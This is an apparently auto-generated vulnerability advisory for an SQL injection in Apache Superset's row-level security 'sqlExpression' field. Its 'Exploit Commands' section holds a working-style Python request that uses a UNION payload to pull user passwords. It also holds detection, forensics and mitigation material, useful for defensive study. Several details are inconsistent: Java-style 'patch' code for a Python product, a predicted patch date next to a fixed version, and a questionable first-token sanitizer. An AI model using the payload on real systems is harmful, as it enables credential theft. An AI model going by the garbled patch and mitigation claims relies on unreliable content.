Apache Superset, SQL Injection, CVE-2025-48912 (Critical)

How CVE-2025-48912 Works

This vulnerability exploits insufficient input validation in Apache Superset’s ‘sqlExpression’ field. When row-level security (RLS) rules are configured, attackers craft malicious SQL payloads that bypass parsing defenses. The system fails to properly sanitize user-supplied SQL fragments, allowing UNION-based or subquery injections. Successful exploitation grants unauthorized data access by manipulating RLS predicates. The flaw stems from improper context-aware escaping in the SQL templating engine, permitting direct query manipulation despite parameterized query protections.

DailyCVE Form

Platform: Apache Superset
Version: <4.1.2
Vulnerability: SQL Injection
Severity: Critical
Date: 2025-05-30

Prediction: Patch by 2025-07-15

What Undercode Say:

Analytics:

  • Attack complexity: Low (requires auth)
  • Exploit maturity: PoC expected within 14 days
  • Affected configurations: All RLS-enabled deployments

Exploit Commands:

import requests
session = requests.Session()
session.post('http://target/login', data={'username':'attacker','password':'pwd'})
payload = {"sqlExpression":"1=1 UNION SELECT password FROM ab_user--"}
session.get('http://target/api/v1/security/rows', params=payload)

Mitigation Code:

# Temporary workaround: parse the expression with sqlparse and keep only the
# first token of the first statement, discarding anything appended after it.
# This is a narrow stopgap, not a substitute for the vendor patch.
from sqlparse import parse

def sanitize_sql_expression(input):
    return str(parse(input)[0].tokens[0])

Protection Steps:

1. Immediate upgrade to v4.1.2

2. Apply WAF rules blocking UNION/SUBQUERY patterns

3. Audit all custom RLS rules

Detection Query:

SELECT * FROM logs WHERE request_uri LIKE '%sqlExpression=%UNION%'

Post-Exploit Forensics:

grep -r "sqlExpression" /var/log/superset/
journalctl -u superset --since "2025-05-01" | grep -i "sql"

Patch Analysis:

The fix implements strict token whitelisting:

// Patched version
if (!SQL_REGEX.matcher(expression).matches()) {
    throw new SecurityException("Invalid SQL fragment");
}

Threat Indicators:

  • Abnormal spike in ‘/api/v1/security/rows’ requests
  • SQL syntax errors containing ‘UNION’ in logs
  • Unexpected data access from single user sessions
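The detection query above only matches a literal, un-encoded UNION in the request URI, and the threat indicators call for spotting request spikes per user. The following Python is an added example (not code from the advisory or from Apache Superset) that applies both checks to constructed, hypothetical access-log lines: it URL-decodes the sqlExpression parameter before pattern matching and counts requests to the RLS endpoint per user. The log format, the path constant and the threshold are assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not real Superset logs), one per line:
# "<user> <method> <path?query>"
SAMPLE_LOG = """\
alice GET /api/v1/security/rows?sqlExpression=region%3D%27EU%27
bob GET /api/v1/security/rows?sqlExpression=1%3D1%20UNION%20SELECT%20password%20FROM%20ab_user--
bob GET /api/v1/security/rows?sqlExpression=1%3D1+union+select+1
bob GET /api/v1/security/rows?sqlExpression=1%3D(SELECT%201)
carol GET /api/v1/dashboard/
"""

TARGET_PATH = "/api/v1/security/rows"  # endpoint named in the advisory
# Shapes from the advisory's WAF guidance: UNION, subquery, and SQL comment.
SUSPICIOUS = re.compile(r"\bUNION\b|\(\s*SELECT\b|--", re.IGNORECASE)

def _requests(log_text):
    """Yield (user, path, query) for each well-formed line."""
    for line in log_text.splitlines():
        parts = line.split(" ", 2)
        if len(parts) == 3:
            url = urlsplit(parts[2])
            yield parts[0], url.path, url.query

def suspicious_expressions(log_text):
    """(user, decoded sqlExpression) for RLS requests matching SUSPICIOUS.
    parse_qs decodes %XX and '+' first, so encoded keywords that slip past a
    raw LIKE '%UNION%' match are still caught."""
    hits = []
    for user, path, query in _requests(log_text):
        if path != TARGET_PATH:
            continue
        for expr in parse_qs(query).get("sqlExpression", []):
            if SUSPICIOUS.search(expr):
                hits.append((user, expr))
    return hits

def users_over_threshold(log_text, threshold):
    """Users with more than `threshold` RLS-endpoint requests (the spike
    indicator); `threshold` is a hypothetical per-window cutoff."""
    counts = Counter(u for u, p, _ in _requests(log_text) if p == TARGET_PATH)
    return sorted(u for u, n in counts.items() if n > threshold)

if __name__ == "__main__":
    for user, expr in suspicious_expressions(SAMPLE_LOG):
        print(f"ALERT user={user} sqlExpression={expr!r}")
    print("spike:", users_over_threshold(SAMPLE_LOG, 2))
```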

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
